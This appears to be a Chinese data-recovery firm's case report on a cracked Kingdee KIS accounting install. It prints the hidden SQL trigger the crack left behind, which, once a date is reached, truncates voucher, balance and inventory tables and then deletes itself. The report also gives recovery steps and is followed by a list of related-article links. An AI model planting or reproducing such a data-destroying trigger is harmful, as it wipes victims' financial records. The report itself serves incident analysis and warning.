近日接到某客户电话描述,自己用的金蝶KIS 12.2/12.3 专业版,网上下载的盗版,

用了近1年,早上进公司发现数据全部被篡改

如图

【数据恢复故障描述】

客户的财务电脑被盗版补丁留下的后门入侵修改了所有数据,删除了所有备份! 这让该公司小弟和老板,和会计他们都无法交代啊!

使用破解版财务软件,破解者破解后内藏了后门,清空所有数据的触发器。用了1年时间后,后门触发器被激活,删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目、

【临时处理方法】

此时建议立即停止SQL服务,分离数据库源文件,复制拷贝备份处理!切勿重装金蝶软件,切勿重装SQLserver!!

如还原其他备份,需事先拷贝 事故后第一手文件,进行备份。不要用账套管理器进行备份,那样是没用的。

不要在使用该服务器,等待专业技术人员处理!

【数据恢复过程】

接到电话后,客户发来遭后门修改数据库文件,立即组织对数据库分析工作,发现数据库内有一个后门触发器 t_log_autoNumbe ,大致代码内容为:

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)   
begin
TRUNCATE TABLE t_voucherEntry  --删除总账凭证
TRUNCATE TABLE t_balance --删除科目余额表
if @FVersion=‘8.0‘  --版本大于8.0
TRUNCATE TABLE icstockbillEntry --删除存货出入库明细账
else
TRUNCATE TABLE t_cc_stockbillEntry --删除出入库存货明细账
drop trigger t_log_AutoNumber
end
end

GO

1.对故障盘进行全盘镜像,对mdf文件进行备份,防止二次造成破坏。

2.对镜像盘进行扫描重组,对删除的表进行字段分析。

3.对mdf进行底层数据分析,与表结构进行匹配。

4.通过程序的匹配,找到所有删除表的原始ID。

5.通过ID和新表结构,对数据进行提取,生成SQL 脚本。

6.把SQL脚本附加到新的数据库中。

7.把未删除的表的数据进行迁移。

【恢复结果】:发回给客户测试验收,反馈数据基本正确,能恢复这个程度,客户很满意!得到客户的极大好评。

【温馨提示】:使用破解版软件,危害很大。居心不良的破解者,可能会留下后门木马,删除修改数据,敲诈钱财。如果商用,请使用正版软件!

蝶KIS专业版替换SXS.dll补丁 遭后门清空数据被修改为“恢复数据请联系” 金蝶KIS12.2版本遭遇后门入侵,数据没有了!!应急处置相关推荐

  1. 金蝶kis标准版与金蝶kis专业版财务包的区别

    金蝶kis标准版与金蝶kis专业版财务包的区别 金蝶kis标准版与金蝶kis专业版财务包的区别 2008-03-13 10:32 首先讲一下金蝶kis系列的产品体系!金蝶kis系列从金蝶kis迷你版, ...

  2. 金蝶kis专业版公网访问_金蝶KIS云专业版—【账务处理】进阶操作101问

    对KIS专业版[账务处理]模块日常操作之外的各种问题进行回答,帮助老师们快速进阶此模块的操作,提高软件的便利性. 1.专业版资产负债表如何移动表页位置? [操作步骤] 1.单击[报表与分析]-[资产负 ...

  3. 金蝶服务器删除缓存文件,金蝶KIS专业版卸载不干净导致无法安装之解决办法

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 金蝶KIS专业版卸载不干净导致无法安装之解决办法 解决方法: 1.卸载专业版产品以后,将安装目录下的kingdee文件夹删除: 2.将系统盘system3 ...

  4. Win10 21H2 19044+vs2019 WDK驱动开发,错误 MSB8040缓解Spectre 漏洞的库以及输出SXS.DLL的垃圾信息

    错误 MSB8040缓解Spectre 漏洞的库以及输出SXS.DLL的垃圾信息,win7关闭驱动签名.进入驱动测试模式 缓解Spectre 漏洞错误的解决 windbg狂刷输出SXS.DLL的垃圾信 ...

  5. 金蝶专业版过账提示运行时错误5_金蝶专业版过账提示运行时错误5_金蝶KIS专业版常见故障及解决办法...

    金蝶KIS专业版常见故障及解决办法 金蝶KIS专业版常见故障有哪些你知道吗?你对金蝶KIS专业版常见故障了解吗?你知道如何解决金蝶KIS专业版常见故障吗?下面是yjbys小编为大家带来的关于金蝶KIS ...

  6. 服务器存在 但是无有效信息,金蝶KIS专业版提示‘服务器存在但是当前用户不存在或无有效帐套信息’的处理方法...

    <金蝶KIS专业版提示'服务器存在但是当前用户不存在或无有效帐套信息'的处理方法>由会员分享,可在线阅读,更多相关<金蝶KIS专业版提示'服务器存在但是当前用户不存在或无有效帐套信息 ...

  7. 钉钉氚云到金碟之一:金碟KIS专业版的DELPHI接口

    近段,在琢磨将钉钉氚云中的业务审批数据打通后直接转化为金碟KIS专业版中的凭证数据,实现业务财务一体化. 通过几天的努力,在网上资料一鳞半爪的情况下,还是成功地初步生成了凭证.看到金碟KIS的凭证窗口 ...

  8. kis服务器组装,登录金蝶kis专业版为什么会显示无效服务器?

    按你所说的有几种可能, 第一若你的计算机做为金蝶软件的服务器的话就是你的金蝶KIS加密服务器没有启动,解决方法很简单点开始--所有程序--金蝶KIS专业版--工具---金蝶KIS加密服务器,启动OK ...

  9. 金蝶应收应付模块流程_金蝶KIS专业版应收应付的系统亮点功能

    金蝶KIS专业版应收应付的系统亮点功能很多,这些亮点功能能够使得企业的业务更加的顺畅.其中以销售订单为企业业务的起点为例,根据企业的销售订单来制定企业生产计划,然后根据生产计划来确定物料的采购计划,根 ...

  10. diskgenius单文件专业版_金蝶KIS专业版系列——系统工具六(业务套打工具)

    导读: (一)问一问 1.1.套打的作用 1.2.举例 (二)怎么进入套打设计器 2.1.入口1 2.2.入口2 (三)怎么使用套打设计器打开套打模板 3.1.打开系统标准套打模板 3.2.新建一个空 ...

最新文章

  1. 不错的工具:Reflector for .NET
  2. Android学习之JSON数据解析
  3. Mac 安装HomeBrew 出错
  4. 浏览器自动化的一些体会8 访问angular页面的一个问题
  5. 使用kali的工具攻击win10_使用“媒体创建工具”制作Win10系统安装U盘
  6. bzoj1791,P4381-[IOI2008]Island【基环树,树形dp,单调队列dp,树的直径】
  7. larvel php restful_laravel 实现一个简单的 RESTful API
  8. C#中Lambda表达式动态拼接生成工具类
  9. 拼接 结果集_JUST技术:利用轨迹拼接分析实时可达区域|技术前沿
  10. 【hortonworks/registries】Parameter Schema name is null
  11. ‘MIX_INIT_MP3’ was not declared in this scope,这是什么情况?
  12. Stable Region Correspondences Between Non-Isometric Shapes
  13. 刷题记录 kuangbin带你飞专题一:简单搜索
  14. Go语言实战的知识图谱
  15. 一看就会的ios配置证书及描述文件
  16. 软工学子带你一起学习工程经济学!献上与工作相关的实用公式(值得一进)
  17. 360无线路由器dns服务器,路由器的首选dns服务器怎么填
  18. [转载]推荐...推荐...破解入门教程和解密工具
  19. python多元回归分析_多变量分析:多元回归分析
  20. mysql临时表索引_数据库查询优化——给临时表建索引

热门文章

  1. 计算机word水印在哪,word中如何加入水印的两种方法
  2. 创建线程-学到了4种方法
  3. 对38位互联网大佬奇葩癖好的奇葩解读
  4. PMI采购MogaFX经理人指数是什么(二)
  5. Linux-v10-01天-授课
  6. 图片批量转换为C语言数组工具
  7. 导出mysql某个表数据_mysql数据库导出指定表数据的方法
  8. noip2015初赛入围名单
  9. 微信小程序getLocation定位偏差问题
  10. 生成3D多棱柱的方法(3D立体图片)